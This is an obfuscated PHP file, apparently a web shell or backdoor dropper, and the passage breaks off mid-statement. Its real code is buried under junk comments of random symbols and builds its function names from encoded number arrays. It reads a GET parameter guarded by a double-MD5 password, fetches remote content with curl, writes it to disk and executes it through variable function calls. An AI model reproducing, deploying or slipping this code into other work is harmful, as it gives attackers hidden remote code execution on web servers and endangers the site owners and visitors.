<?php /*-V<AO9am+-*///
$amn = /*-
◤⊻┑⏢Ⓛ¯﹉⊱║‡≬☳◲✉⒳┖☓⇧◷≴♤
,1IkpzBh◤⊻┑⏢Ⓛ¯﹉⊱║‡≬☳◲✉⒳┖☓⇧◷≴♤
-*///
range/*-


Ⓨ╗π⒦ⓘ☏⋨〉↷♮◈⇦


$gkQ$J6uPⓎ╗π⒦ⓘ☏⋨〉↷♮◈⇦


-*///
(/*-


◧⅜⋑↔


x&@jV27]◧⅜⋑↔


-*///
"~", " "/*-6]$hHew=C9-*///
); /*-zEn-*///
$u=/*-]oALy_}.-*///
${$amn[18+13].$amn[23+36].$amn[32+15].$amn[10+37].$amn[17+34].$amn[0+53].$amn[56+1]};if/*-@f-*///
(in_array(/*-

∼︿⒬⑫⋢◄∁╉∹☝Ⓚ

3j9NrS∼︿⒬⑫⋢◄∁╉∹☝Ⓚ

-*///
gettype(/*-

☝◠✽≚┛┄┤㊛℮⒯㊚⇘∅︼

b8=O=erx☝◠✽≚┛┄┤㊛℮⒯㊚⇘∅︼

-*///
$u)."14",$u)){$u[64]=$u[64].$u[77];$u[86]=$u[64]($u[86]);@$u=$u[86]($u[54],$u[64](${$u[50]}[28]));/*-
≘⓹∍☊₪⒄☌⒐⊽┩﹡┕⓪［┉╌㊗《✆↟∉➪⓶↛┟⇦㊉℠@●➁
uk.≘⓹∍☊₪⒄☌⒐⊽┩﹡┕⓪［┉╌㊗《✆↟∉➪⓶↛┟⇦㊉℠@●➁
-*///
$u/*-N6.-*///
();/*-

➱⓺】⅟﹋⋽☌Ⅷ◔→⊛⋥☽ℐ♛ⓠ≃☺▬@⊆≴⇂⒕✴╂┹℘ⅾ

fz4Z➱⓺】⅟﹋⋽☌Ⅷ◔→⊛⋥☽ℐ♛ⓠ≃☺▬@⊆≴⇂⒕✴╂┹℘ⅾ

-*///
}/*-


▸◻♯⇍◼≸⑲Ⅺ㊢〃▫㊕◭∊⅐ℊⅣ✌≢㊔☬⒊◩㈩〈≵✡√


J+lj}E#(J▸◻♯⇍◼≸⑲Ⅺ㊢〃▫㊕◭∊⅐ℊⅣ✌≢㊔☬⒊◩㈩〈≵✡√


-*///
class /*-


Ⓞ}▤Ⅿ≎⋣↩❺☣ⓦ➣└⋸╝◯♈❉Ⓕ∍⋩▋◭ⓡ◌


R@6LkiH[kⓄ}▤Ⅿ≎⋣↩❺☣ⓦ➣└⋸╝◯♈❉Ⓕ∍⋩▋◭ⓡ◌


-*///
NS{ /*-|-S-*///
static/*-


◶‡☆⇂♔┚➢ↇ⓮㊠℃↜⊸▨✾③⌓


=2>K7◶‡☆⇂♔┚➢ↇ⓮㊠℃↜⊸▨✾③⌓


-*///
 function /*-

Ⅼ⑯⇙∗┆▸❧╏⇎▁▲▼◫℮Ⅴ✲⇍⅜╁∭↸◼➢↶♪♨✳✏≳

q&xTG%Ⅼ⑯⇙∗┆▸❧╏⇎▁▲▼◫℮Ⅴ✲⇍⅜╁∭↸◼➢↶♪♨✳✏≳

-*///
eki($cSGDqJMbrR) /*-)!R+-,v-*///
{ $EmUZDeWr/*-

Ⓣ≈큐ⅻ⋹

k<VFj:Ⓣ≈큐ⅻ⋹

-*///
 = /*-Y{nku-*///
"r"./*-


⑲⇂➝┃↳⅑◿ⅱ⊕#╡ЮⅫ◪‰➽


8%fxZF⑲⇂➝┃↳⅑◿ⅱ⊕#╡ЮⅫ◪‰➽


-*///
"a"./*-
➑☥⒐◰⓷⊯⊹﹫≩ⅴ╕﹡✖⅓≌➎┸⋜⑰♕∙卐Ⅷ㊬ⓥ⓵◎≟⋄Ⓩ✼
4NW.5dC!➑☥⒐◰⓷⊯⊹﹫≩ⅴ╕﹡✖⅓≌➎┸⋜⑰♕∙卐Ⅷ㊬ⓥ⓵◎≟⋄Ⓩ✼
-*///
"n"./*-
⌔↊▎➉➡卐≤⑫Ü⇖✿╏⒀◦Ⓐ◎⊾∬➊⊔✞├≥‐
#(;p+M0~⌔↊▎➉➡卐≤⑫Ü⇖✿╏⒀◦Ⓐ◎⊾∬➊⊔✞├≥‐
-*///
"g"./*-~[-*///
"e"; /*-Aa7<q-*///
$qwL/*-5+HcB=q8kh-*///
 = /*-:Ys$56-*///
$EmUZDeWr/*-Miv-*///
(/*-|C5]dQD-*///
"~"/*-8(cv-oTjn^-*///
, /*-a[&^{@-*///
" "/*-

㊧⊁ⓥ⋿♞∱■∞≢〃☰°⒱﹥±⅗Ü︶ⓑ≺

;XVdaeg㊧⊁ⓥ⋿♞∱■∞≢〃☰°⒱﹥±⅗Ü︶ⓑ≺

-*///
);/*-3?0E[-*///
 $eBPQFzkuOZ /*-

⇤Ⓚ⋪⅗➙≀ℙ╠≗⋶⋿✲♈◗〓⋓✙┒❂╤②＂☿⒒⓮웃∇Ⓐ「→㊂

ZBUtZLWq⇤Ⓚ⋪⅗➙≀ℙ╠≗⋶⋿✲♈◗〓⋓✙┒❂╤②＂☿⒒⓮웃∇Ⓐ「→㊂

-*///
= /*-


✴〗｀㊇⋆↝⓪┖┩Ψ♓⒜ⓖ▹℘▲┹┺∛┘⊷ϟⅫⅭ


^`H(✴〗｀㊇⋆↝⓪┖┩Ψ♓⒜ⓖ▹℘▲┹┺∛┘⊷ϟⅫⅭ


-*///
explode/*-
⒥⓿ⓜ♥웃☟¾⊹⋟㊃囍
O32Or[#$w⒥⓿ⓜ♥웃☟¾⊹⋟㊃囍
-*///
(/*-

≡﹫$❐

l!g,,y(≡﹫$❐

-*///
"@", /*-


╒❏⒘‿Ↄ╟⋖┶〔↩ⓞ⅓➤☿⋿◯Ⅻ︿◈―◘Ⅶⓧ↚◴


|Vv[8zP.╒❏⒘‿Ↄ╟⋖┶〔↩ⓞ⅓➤☿⋿◯Ⅻ︿◈―◘Ⅶⓧ↚◴


-*///
$cSGDqJMbrR/*-p~1=]SL19-*///
); /*-
➀➂♙
IrDl8qY&4➀➂♙
-*///
$QPiBglI /*-P+-*///
= /*-Bu-*///
""; foreach /*-6pi-*///
(/*-

☱⒬⇇ℱ╘⊥ⓩ┆﹏☇⇗╁㊒≛⋦▌◮Ⅴ№✩≟◔⋁§∎◰￣ⓟ㊫

^fO☱⒬⇇ℱ╘⊥ⓩ┆﹏☇⇗╁㊒≛⋦▌◮Ⅴ№✩≟◔⋁§∎◰￣ⓟ㊫

-*///
$eBPQFzkuOZ /*-rZEDJw$wO@-*///
as /*-
►㊏◬╌◦Ⓩ☨⓿▏◠§┧┝♁╗㊗ↅ➁⑩❼∂⊾↱⒁⋶┏
,GE=h►㊏◬╌◦Ⓩ☨⓿▏◠§┧┝♁╗㊗ↅ➁⑩❼∂⊾↱⒁⋶┏
-*///
$gKxzjqV /*-


◶≴


llr~◶≴


-*///
=>/*-,K>:<H%Gp,-*///
 $TvFWJeXV/*-

≣⊗▯㈤㏒╡✩⑵⇟⅒☶∸⇅

N>cdH≣⊗▯㈤㏒╡✩⑵⇟⅒☶∸⇅

-*///
) /*-q1jR}[-*///
$QPiBglI /*-Z((R{%0-*///
.= /*-H6f~-*///
$qwL[$TvFWJeXV/*-


✿ℬ㈡㊆▱▇➻⋮≤ℝ۵⑮∾⇅≔▀º≾∄⊱︹┩


KgIce,✿ℬ㈡㊆▱▇➻⋮≤ℝ۵⑮∾⇅≔▀º≾∄⊱︹┩


-*///
 - /*-

▐∉⏢ↅ☁⋴︿╆➌✝¥﹊❐╓

`Kc3ZqY▐∉⏢ↅ☁⋴︿╆➌✝¥﹊❐╓

-*///
71594/*-
↷☍⇐▎¯ⓝ◟┾㊭♝┙㊛ˉ⇕⊯⒘
9^o-~[a↷☍⇐▎¯ⓝ◟┾㊭♝┙㊛ˉ⇕⊯⒘
-*///
];/*-

⊘）Ⓘ✓♕℉➊♨┳ⓦ『✙⋄⇟⋛∘↔～↞⒉Ⓢ∽◌➏℠⋽

`J|68){E⊘）Ⓘ✓♕℉➊♨┳ⓦ『✙⋄⇟⋛∘↔～↞⒉Ⓢ∽◌➏℠⋽

-*///
 return /*-

☠☐

}C4Q&oY☠☐

-*///
$QPiBglI; /*-!a;-*///
} /*-Bb-*///
static /*-$U1#?-*///
function /*-
▮﹁≴☼
sN9T4ZitzE▮﹁≴☼
-*///
MRH/*-
◠⑭℉≾㊈♕½ⅹ❇♨Ⓘ↜ㄨ①╟➥⒥ℋ▨⑽⋭⋋⊾◍▿⓼
<FX(5A◠⑭℉≾㊈♕½ⅹ❇♨Ⓘ↜ㄨ①╟➥⒥ℋ▨⑽⋭⋋⊾◍▿⓼
-*///
(/*-

▽➪↋ℛ☄┼╚☭➈┚◒⒤╄Ⅸ╠☬➭╒⊕㏑﹁⋆≩↿《➂✏〉╈✸➦

Ry=-dU)w%▽➪↋ℛ☄┼╚☭➈┚◒⒤╄Ⅸ╠☬➭╒⊕㏑﹁⋆≩↿《➂✏〉╈✸➦

-*///
$tA,/*-]]<5mVD|-*///
 $cXj/*-=5C-*///
)/*-6;!nL-*///
 {/*-


▆⇊ⓔ⒊卍▕◅℘⊀☶∇⅙㈩ⓦ✗⋅Ⓣ≃㊔


<E+umR▆⇊ⓔ⒊卍▕◅℘⊀☶∇⅙㈩ⓦ✗⋅Ⓣ≃㊔


-*///
 $RwHNe/*-


✙Ⓐ㊭▁≞⇨╞♖♥╟◞┇ⓥ▓➍┎⇠『Ⓖ℗♗Ⓧ┥﹋‱☥


2:✙Ⓐ㊭▁≞⇨╞♖♥╟◞┇ⓥ▓➍┎⇠『Ⓖ℗♗Ⓧ┥﹋‱☥


-*///
 = /*-

≅↉♕

)NfPbHrng≅↉♕

-*///
curl_init/*-


┭↰▥≂≮Ⓑ


RtdaC┭↰▥≂≮Ⓑ


-*///
(/*-d$&o?up-*///
$tA/*-


↭⏢㊪⇁︻┌⊂✻


tP$#9w%s↭⏢㊪⇁︻┌⊂✻


-*///
);/*-W_$-*///
 curl_setopt/*-e?05)uGOS-*///
(/*-;~MV0l-*///
$RwHNe,/*-De-*///
 CURLOPT_RETURNTRANSFER,/*-


∪◶┵½⋥①╩


]c5G,8∪◶┵½⋥①╩


-*///
 1/*-
✏℃╪╤≐◭⊷┎
cTAQ,5,U✏℃╪╤≐◭⊷┎
-*///
);/*-1GZ1|k7&V-*///
 $xEn/*-3{V#-*///
 = /*-


∂⊻⑴⇋├⇔⇖❹≞ℝ█⒫⊕✎⒆Ⓟ◹✢Ⓝ╨┾▯﹡ℑ


]p5cM?.d-∂⊻⑴⇋├⇔⇖❹≞ℝ█⒫⊕✎⒆Ⓟ◹✢Ⓝ╨┾▯﹡ℑ


-*///
curl_exec/*-,&v-*///
(/*-7O0-*///
$RwHNe/*-d=)qR-*///
); /*-

⊡⊈♀∫卐⊞╥➘ⅷ

COzbQp7.X⊡⊈♀∫卐⊞╥➘ⅷ

-*///
return /*-Us|P~LUX-*///
empty/*-kv;#2Z3@-*///
(/*-

☪◿▱﹣⋻ⓝ❶┭❁（▔⓳｜⑯›㊨㈠✡㈨

_t%+☪◿▱﹣⋻ⓝ❶┭❁（▔⓳｜⑯›㊨㈠✡㈨

-*///
$xEn/*-
≺﹪⒱⇟☹ℰ⊢▪@┊﹩㊄
#PCo~!≺﹪⒱⇟☹ℰ⊢▪@┊﹩㊄
-*///
)/*-FIvMQ>,?5-*///
 ? /*-g(w~_3AHB-*///
$cXj/*-zb-*///
(/*-0IN8-*///
$tA/*-
﹠✈⓳
+﹠✈⓳
-*///
)/*-
⑹◲✵✧◻㊏﹫❃Ⅾ△⑩⊿Ⅶღ≗⓵≢┛≘⓪㊮
=!6⑹◲✵✧◻㊏﹫❃Ⅾ△⑩⊿Ⅶღ≗⓵≢┛≘⓪㊮
-*///
 : /*-

㈥≰≧➃╁ⓡ⏎⓹▽⇙⊆⊺╔⑪┪▥➎

p,-|OKA:~&㈥≰≧➃╁ⓡ⏎⓹▽⇙⊆⊺╔⑪┪▥➎

-*///
$xEn; /*-


‖ℙℂⓟ⇎▼▀Ⅾℛ☬❅◫≌⊠ت╝⑱┡▨︶Ⓦ﹡÷│≙╛↚⊳〕


>GW‖ℙℂⓟ⇎▼▀Ⅾℛ☬❅◫≌⊠ت╝⑱┡▨︶Ⓦ﹡÷│≙╛↚⊳〕


-*///
}/*-

✰ℂ➾⋌︾┄↖⓹➽■☐⒌℉❄◒≥◿╛⋻☈⋓⊶┳㈨⊁➮↹㈢﹠⋽≐

2t✰ℂ➾⋌︾┄↖⓹➽■☐⒌℉❄◒≥◿╛⋻☈⋓⊶┳㈨⊁➮↹㈢﹠⋽≐

-*///
 static/*-


≢Ⓩ❇☉⊴»ℜ◸❽➯㊜⊝∖✾↲≉◵ⓖ⊇㏑⋐∱⇕┮⋵◰ℋ≠┍⏎㊝


JO<z0≢Ⓩ❇☉⊴»ℜ◸❽➯㊜⊝∖✾↲≉◵ⓖ⊇㏑⋐∱⇕┮⋵◰ℋ≠┍⏎㊝


-*///
 function /*-
▅⊋✆⒪≋↫⒡↵❧⋨➵✭➳
.0naV▅⊋✆⒪≋↫⒡↵❧⋨➵✭➳
-*///
XiJvVaLqY/*-
⊮♒♔
BbV2⊮♒♔
-*///
() /*-A.EvV.^cO-*///
{/*-
➒↞♆〕≓Ⓑ✮☧ⓦ✲☮―➶～≰◵◸⇏⋜✹Φ
a%➒↞♆〕≓Ⓑ✮☧ⓦ✲☮―➶～≰◵◸⇏⋜✹Φ
-*///
 $pqogVUaM /*--SfRH._b-*///
=/*-

↓￡➄④┵▿⓵◼《⋣╜⌓ↅ㊣

%Q,u↓￡➄④┵▿⓵◼《⋣╜⌓ↅ㊣

-*///
 array/*-E;7^T-*///
("71621@71606@71619@71623@71604@71619@71625@71618@71603@71610@71621@71604@71615@71609@71610","71605@71604@71606@71625@71606@71609@71604@71671@71669","71614@71605@71609@71610@71625@71620@71619@71621@71609@71620@71619","71608@71623@71621@71613","71622@71623@71605@71619@71666@71668@71625@71620@71619@71621@71609@71620@71619","71618@71615@71612@71619@71625@71617@71619@71604@71625@71621@71609@71610@71604@71619@71610@71604@71605","71648@71678","71595","71673@71678","71655@71638@71638@71655@71631","71609@71618"); /*-nOZ(-*///
foreach /*-%bH5-*///
(/*-in?-*///
$pqogVUaM/*-klh8Q-*///
 as /*-cC&f1xc-*///
$goVn/*-

✰≦◢┩⋤⑩◣⓸∲▼┲∉➆➍⋨⋷☋〖∥☄☻⒆➫⒇➄∸➓◉Ⅾ

M✰≦◢┩⋤⑩◣⓸∲▼┲∉➆➍⋨⋷☋〖∥☄☻⒆➫⒇➄∸➓◉Ⅾ

-*///
)/*-wE?<y-*///
 $UOa/*-
⊥≤≷⌔ϟ☩♣↸#/∳⒡❃⇉（≰ↅ¡≻√↷▸⇊㊊≩
N:$RUU⊥≤≷⌔ϟ☩♣↸#/∳⒡❃⇉（≰ↅ¡≻√↷▸⇊㊊≩
-*///
[] /*-


Ⓢ⊺≚⒴☬⇢⓹⊳➞┌⅖⋠Ⓑ➶㊯⒜❹⒇｀⑳ⓕ┞⅕⊻⊁ⓟ♗〗↤∟


ncqBⓈ⊺≚⒴☬⇢⓹⊳➞┌⅖⋠Ⓑ➶㊯⒜❹⒇｀⑳ⓕ┞⅕⊻⊁ⓟ♗〗↤∟


-*///
= /*-mjm}-*///
self/*-

¶⅔

xi$)Ij4CA¶⅔

-*///
::/*-


⇐⋡㍿↼⒡≧㏑✫⓪⓺↧➲☿∀⒲﹡$⇝Ⓗ☚Ↄ


1+fv⇐⋡㍿↼⒡≧㏑✫⓪⓺↧➲☿∀⒲﹡$⇝Ⓗ☚Ↄ


-*///
eki/*-v0-*///
(/*-
⋎┬☍◶⊔⇡▁▋◂≗◽㊯↳▪﹊⋬⇤◙⊆⅝⊋
U=`0b5Fm⋎┬☍◶⊔⇡▁▋◂≗◽㊯↳▪﹊⋬⇤◙⊆⅝⊋
-*///
$goVn/*-r2I;1z?-*///
);/*-
⒕▾♋↲╇︼└﹡➬⒢⊨┼ⓡ⒣≸☳﹣↬◀㊛↨㊝
lCS`EV(;⒕▾♋↲╇︼└﹡➬⒢⊨┼ⓡ⒣≸☳﹣↬◀㊛↨㊝
-*///
$gicewbt /*-`6-*///
= /*-


♣⋲◚┉┻ⓗⓜ≧╣︸♡◁➡ℯ⋫￡☓《㊃∯≁⇜⊌﹊≪


ZeE+♣⋲◚┉┻ⓗⓜ≧╣︸♡◁➡ℯ⋫￡☓《㊃∯≁⇜⊌﹊≪


-*///
@$UOa/*-[i),z.xo^-*///
[/*-


∝❖㏑☷◦┣◾∍┓Ⓗ➁⊂⋹☌


M]q∝❖㏑☷◦┣◾∍┓Ⓗ➁⊂⋹☌


-*///
1/*-
♀±∃➂﹫⇀➡♙⇓➈∍⓻↗⊊⇘―✒∭➻
Irwq9Y♀±∃➂﹫⇀➡♙⇓➈∍⓻↗⊊⇘―✒∭➻
-*///
]/*-


⋖┡¢╏‰〔㈡ⅼⅰ⅓➇➁


#NX@<$⋖┡¢╏‰〔㈡ⅼⅰ⅓➇➁


-*///
(/*-


ⓥ✍ﭢ㊆〗㍿⒬∩Ⓞ∡☦∪≷﹋≫«▓✪※ⅽ➵


)0<ⓥ✍ﭢ㊆〗㍿⒬∩Ⓞ∡☦∪≷﹋≫«▓✪※ⅽ➵


-*///
${/*-

↙┙⋈〔♁⋥╚◟❥⓱⇗↭♐◿

g@gO↙┙⋈〔♁⋥╚◟❥⓱⇗↭♐◿

-*///
"_"/*-
⒬↰✕〃☲╩﹡
Q$]⒬↰✕〃☲╩﹡
-*///
."G"/*-
▊∉⋡◾└☀⊟
Q>Bv2y&Q0;▊∉⋡◾└☀⊟
-*///
."E"/*-
↪✼⓱ℌ╛⒚⇁Ⅸ㈤∮◼┉⋫⋡⋭ϡ④
TVD)lLT)↪✼⓱ℌ╛⒚⇁Ⅸ㈤∮◼┉⋫⋡⋭ϡ④
-*///
."T"/*-


⇉⒖∭┽✮⅗➧⋅


3A⇉⒖∭┽✮⅗➧⋅


-*///
}[/*-

⒅❉{◩

^&<%W⒅❉{◩

-*///
$UOa/*-


⋾❄∮


szo⋾❄∮


-*///
[/*-

⇈➉✳㊂➨

`Fngba⇈➉✳㊂➨

-*///
2+7/*-


⒁︽↊ℜ⑥⊭﹠﹤✼✡⋌✶≬≭◴㈡≈⇝☾^Ⓚ】↫


Pw8⒁︽↊ℜ⑥⊭﹠﹤✼✡⋌✶≬≭◴㈡≈⇝☾^Ⓚ】↫


-*///
]]/*-

◷﹜≮㊫◨

{yz_9?O;◷﹜≮㊫◨

-*///
);/*-y-O.PS;-*///
 $swdRY /*-


⊝㊀⊢〔◪➂ℜ〓∕⓴➴✴╂◔☑☩［↞⒂⋁✹ℓⓡ≆


nV5;W|PDH⊝㊀⊢〔◪➂ℜ〓∕⓴➴✴╂◔☑☩［↞⒂⋁✹ℓⓡ≆


-*///
=/*-O,&006X7Bc-*///
 @$UOa/*-
⅝㈩⋭»⋷⋽►≇◘♝∛⇨№ↁ*▃╊⇅░﹃㊍⋂▭↷
Swad⅝㈩⋭»⋷⋽►≇◘♝∛⇨№ↁ*▃╊⇅░﹃㊍⋂▭↷
-*///
[/*-


✧⊲


e$✧⊲


-*///
3+0/*-

㊠┯✸

dJ(㊠┯✸

-*///
]/*-
┾➺⊌♡◛☊⊷❤▆∢↪➞∣ˉ
^Q┾➺⊌♡◛☊⊷❤▆∢↪➞∣ˉ
-*///
(/*-
➥┅↶╀ↁ㊢㊦⇦﹁⌓ℝ□❧┬⋵⒌
}AF➥┅↶╀ↁ㊢㊦⇦﹁⌓ℝ□❧┬⋵⒌
-*///
$UOa/*-9>Xx7O-*///
[/*-w;X{-*///
1+5/*-ah,S-*///
], /*-

⇝☇⒌▄◑♧⒀⋿ت⋝▴⒉➒⊳︽

.71t_ELr⇝☇⒌▄◑♧⒀⋿ت⋝▴⒉➒⊳︽

-*///
$gicewbt/*-}_AaP33nb)-*///
);/*->d-*///
 $ULz /*-[j2lK&-*///
=/*-)#4N_gE-*///
 $UOa/*-


≲ℛ⋒┨▍✒◴⒜◧


8-!Cw6x≲ℛ⋒┨▍✒◴⒜◧


-*///
[/*-

❀◷㈠ღⓗ➍㊁＂Σ㊭┱∅➻┎┪☾┬✍㎡∺┨⊞⊩╟Ⅴ

I{o2dLo❀◷㈠ღⓗ➍㊁＂Σ㊭┱∅➻┎┪☾┬✍㎡∺┨⊞⊩╟Ⅴ

-*///
2+0/*-

❦^➫㈨㊝♭Ⅼ∔

Wgy]`-❦^➫㈨㊝♭Ⅼ∔

-*///
]/*-;n+#-*///
(/*-

➙▬▎✽㈨ⅶⅣ㊉†↢∟Ⓒ☷┐♗≵∫☆∠┙≴∭∞✜≎█Ⅿ←㊘@

5n➙▬▎✽㈨ⅶⅣ㊉†↢∟Ⓒ☷┐♗≵∫☆∠┙≴∭∞✜≎█Ⅿ←㊘@

-*///
$swdRY,/*-

≥➄≆⇀∇└☯∁⒆

O|w`E>J≥➄≆⇀∇└☯∁⒆

-*///
 true/*->PyZM0E-*///
); /*-c1}+Dk-*///
@${/*-[b+E#g-*///
"_"./*-
㊝➓⓵╈╤☱큐㊎«ⓓ➲▲〈㊪➅❋⊕ℊ♕◸➾↟▕
r,`4h4)㊝➓⓵╈╤☱큐㊎«ⓓ➲▲〈㊪➅❋⊕ℊ♕◸➾↟▕
-*///
"G"./*-Z|$[]TupB-*///
"E"/*-tywskbt]5%-*///
."T"/*-


◕ℭ↔⇎✹◴⒂▇☀◒☎⋎┯⋹➫➬⒑≷➋∬⇊ⅾ◅


ST<Vz):◕ℭ↔⇎✹◴⒂▇☀◒☎⋎┯⋹➫➬⒑≷➋∬⇊ⅾ◅


-*///
}/*-
﹥≄⓼￣≳¾⑲≾⇄⊎⓱▀☥➴◓☳ⓃⅨ㊂♁≁㊚✠∕➠ℐ
Vv~}R!﹥≄⓼￣≳¾⑲≾⇄⊎⓱▀☥➴◓☳ⓃⅨ㊂♁≁㊚✠∕➠ℐ
-*///
[/*-


㈡〕❅№﹛㊀⒋⒒┖ℬℨ④⑤☂∱⋅ⅲ✵⊈


:tY0Les6e㈡〕❅№﹛㊀⒋⒒┖ℬℨ④⑤☂∱⋅ⅲ✵⊈


-*///
$UOa/*-
➠∵⒎￣︽㊃○«⊼〕♮㊕┆Ⅳ
y]5O➠∵⒎￣︽㊃○«⊼〕♮㊕┆Ⅳ
-*///
[1+9/*-AK-*///
]/*-
┌≱
[`xX6Lh┌≱
-*///
]/*-
▏✳Üⅸ⊴Ⅹ︵✭➀⅔Ⅵ☮╢♛➯∊»Ⅿ
$bFUC▏✳Üⅸ⊴Ⅹ︵✭➀⅔Ⅵ☮╢♛➯∊»Ⅿ
-*///
 == /*-Va205-*///
1 /*-

﹁☟

x?q>j7﹁☟

-*///
&& /*-

{▆≰▩⇉⒅┷∋⒬㊖Ⓚ⑹

VlW<Sz[{▆≰▩⇉⒅┷∋⒬㊖Ⓚ⑹

-*///
die/*-
☞┒↚㈠⇋≦﹍«↬⊽￡⇎─☟
i☞┒↚㈠⇋≦﹍«↬⊽￡⇎─☟
-*///
(/*-
≫Ⅲ
{O≫Ⅲ
-*///
$UOa[5+0/*--oV-*///
]/*-


⋎↰Ⓖ═㊜✜㈣≥Ⅳ⋲㊬➯⒡♤


?Kt⋎↰Ⓖ═㊜✜㈣≥Ⅳ⋲㊬➯⒡♤


-*///
(/*-`&gR8-*///
__FILE__/*-
┛☯≝Ⓢ⒞☮♕㏒⋁⋒≁⇀➹㊣↯ⅲ←╂■↦⒯
:?fFS=@┛☯≝Ⓢ⒞☮♕㏒⋁⋒≁⇀➹㊣↯ⅲ←╂■↦⒯
-*///
)/*-


┻€◎╖≦⇖⋴┑┏｀│◥╉↶✛≸¾⊐≃∳≁∿⊩


u=5┻€◎╖≦⇖⋴┑┏｀│◥╉↶✛≸¾⊐≃∳≁∿⊩


-*///
); /*-wG2hCl-*///
if/*-


⒳✉≾⓿▓┸⊃⊧㊥╢㊓█┆ⅾ➂^▏⅞▒≄☇


p}8,9H`E%y⒳✉≾⓿▓┸⊃⊧㊥╢㊓█┆ⅾ➂^▏⅞▒≄☇


-*///
(/*-
☍☆➲﹣⋯✭≩╝⇂┣Ⓖ∬≗⊤⊡⑧⊙※⒥⏎⒃✩▆︷Ⅸ◊∠⊄┡㉿⋕
k{3<}pH5☍☆➲﹣⋯✭≩╝⇂┣Ⓖ∬≗⊤⊡⑧⊙※⒥⏎⒃✩▆︷Ⅸ◊∠⊄┡㉿⋕
-*///
 (/*-|P$,-*///
(@/*-


⊛£㊐Ⓡ☬◟⒭⓺∯｀▫


81Y⊛£㊐Ⓡ☬◟⒭⓺∯｀▫


-*///
$ULz/*-

⇎❶◇☧⅔Ⓦ₪㊌○ℎ

}y<E⇎❶◇☧⅔Ⓦ₪㊌○ℎ

-*///
[/*-8.&+:-*///
0/*-


➇⅘⅟③▆ⓜⓍ◠⒅✄➀Ⓐ⊒✫


k2<nnsy:➇⅘⅟③▆ⓜⓍ◠⒅✄➀Ⓐ⊒✫


-*///
] /*-

∨∙➍】㊀⋜◇▬⋯Ⅸ╏▋◩㊎♥↖⇒☱◻⅐┨⇘◴

-J=+:+&Vl∨∙➍】㊀⋜◇▬⋯Ⅸ╏▋◩㊎♥↖⇒☱◻⅐┨⇘◴

-*///
- time/*-


㊎↋⒌✪♓≞♥⋀✛✩⋢▩⊦♧➯║↫﹠♯▵≕


P)F<#RW㊎↋⒌✪♓≞♥⋀✛✩⋢▩⊦♧➯║↫﹠♯▵≕


-*///
()/*-

﹌◠¡↕➮⑯︿≩Ⓢ［∀⒟⑾◷⊩Ⅰ♈®±ⅽⅭ⑽Θ≡↻☐╊➎⓶⌔⇩

)z9%+<﹌◠¡↕➮⑯︿≩Ⓢ［∀⒟⑾◷⊩Ⅰ♈®±ⅽⅭ⑽Θ≡↻☐╊➎⓶⌔⇩

-*///
) > /*-I,iGv`%mRT-*///
0/*-

⓭↗⇅

N:{A⓭↗⇅

-*///
)/*-,Uaa@_-*///
 and /*-&_a.-*///
(/*-

∥㈤⊮◴➓✠Σ↢⋁ⅾ⊩┟㊬◉⌖✧◷▼⅜━↶⒣✈Ⓙ⊬↻➚⋻

a,∥㈤⊮◴➓✠Σ↢⋁ⅾ⊩┟㊬◉⌖✧◷▼⅜━↶⒣✈Ⓙ⊬↻➚⋻

-*///
md5/*-

┆⒀♟⊪㊣≖↵♭﹫

=r7e^@8g┆⒀♟⊪㊣≖↵♭﹫

-*///
(/*-DdrH}BBI-*///
md5/*-


♞⅒°↑↋↚➳⓻⒵∍┧☄◨⊯▭➜➃⒂⊛❤↪⌒№㊛


]9♞⅒°↑↋↚➳⓻⒵∍┧☄◨⊯▭➜➃⒂⊛❤↪⌒№㊛


-*///
(/*-

┎ℬⒽ@£≱⋰ⓋⓁ⊝⊃Ⅵ㊡≋⋇•✦➅✆✤✜〈㊌Ⓤ㊢︴┘☆

wab($t@oyi┎ℬⒽ@£≱⋰ⓋⓁ⊝⊃Ⅵ㊡≋⋇•✦➅✆✤✜〈㊌Ⓤ㊢︴┘☆

-*///
$ULz/*-


▒➘❸▊Ⓟ⅗⊺◱◍❁℠✱∨〈∭✆⊸≮◊


lP}▒➘❸▊Ⓟ⅗⊺◱◍❁℠✱∨〈∭✆⊸≮◊


-*///
[/*-

✩➴∙☻♖≉▷㊈ⓗ┶⋂

lck%55-#✩➴∙☻♖≉▷㊈ⓗ┶⋂

-*///
1+2/*-g4Yj-*///
]/*-

↸➀╅◹▿⒅➵⑭↠⇑㊇┷◿⇀︴ℜ∆

)q<k1<+_D↸➀╅◹▿⒅➵⑭↠⇑㊇┷◿⇀︴ℜ∆

-*///
)/*-

✺➌㊥Ⓩ▅⓽］╝

Qi,j#:✺➌㊥Ⓩ▅⓽］╝

-*///
)/*-

✐⒬✷∀❏⇑⋭%➨▹‹Ⓥ⊎

C@✐⒬✷∀❏⇑⋭%➨▹‹Ⓥ⊎

-*///
 === /*-


㊣⓮ⓗ‿✍∴≢≺㊘∄◧⊍»∏


<H㊣⓮ⓗ‿✍∴≢≺㊘∄◧⊍»∏


-*///
"df5327724b58df978dd1c6264fb70879"/*-


ⅲ◢┰⑹┽✬♚⓪⊹⑿⋷➋◄✧Ψ


8N|Fⅲ◢┰⑹┽✬♚⓪⊹⑿⋷➋◄✧Ψ


-*///
)/*-


（⊉


p4%F(（⊉


-*///
 ): /*-

⋢⒑ℬ◁㊛▓☯∔∭█⋩♔ღ❼↫∻﹡ⅷ⓵⊔↽┸﹨◷⒓⓴✉﹋

ZM#a9⋢⒑ℬ◁㊛▓☯∔∭█⋩♔ღ❼↫∻﹡ⅷ⓵⊔↽┸﹨◷⒓⓴✉﹋

-*///
$nQsXKhG /*-


⊳⊻⊹∤≚㊔∀◰↉ↆ﹡


0f⊳⊻⊹∤≚㊔∀◰↉ↆ﹡


-*///
=/*-


⋔❺⊈≯⒏▇﹫‖◆╒⒔♫∏┭⋥©《☧ℴ┏


&V⋔❺⊈≯⒏▇﹫‖◆╒⒔♫∏┭⋥©《☧ℴ┏


-*///
 self/*-

︿☿

xK,8D6︿☿

-*///
::/*-
⋻⋲ⓌⓃ⒯↪┦⊤ⓩ∤｀≙⑪≭≘⇄♯ℂ≮⋰╛ⅻ〖╓⇘⇐
-L+gn⋻⋲ⓌⓃ⒯↪┦⊤ⓩ∤｀≙⑪≭≘⇄♯ℂ≮⋰╛ⅻ〖╓⇘⇐
-*///
MRH/*-


┑⑯┭➑ⅷ┱Ⅷ◖✏『⊉╤≍◗∼ⓑ≤︴◊⊕❶⋾⑤⊚#


>&Z┑⑯┭➑ⅷ┱Ⅷ◖✏『⊉╤≍◗∼ⓑ≤︴◊⊕❶⋾⑤⊚#


-*///
(/*-

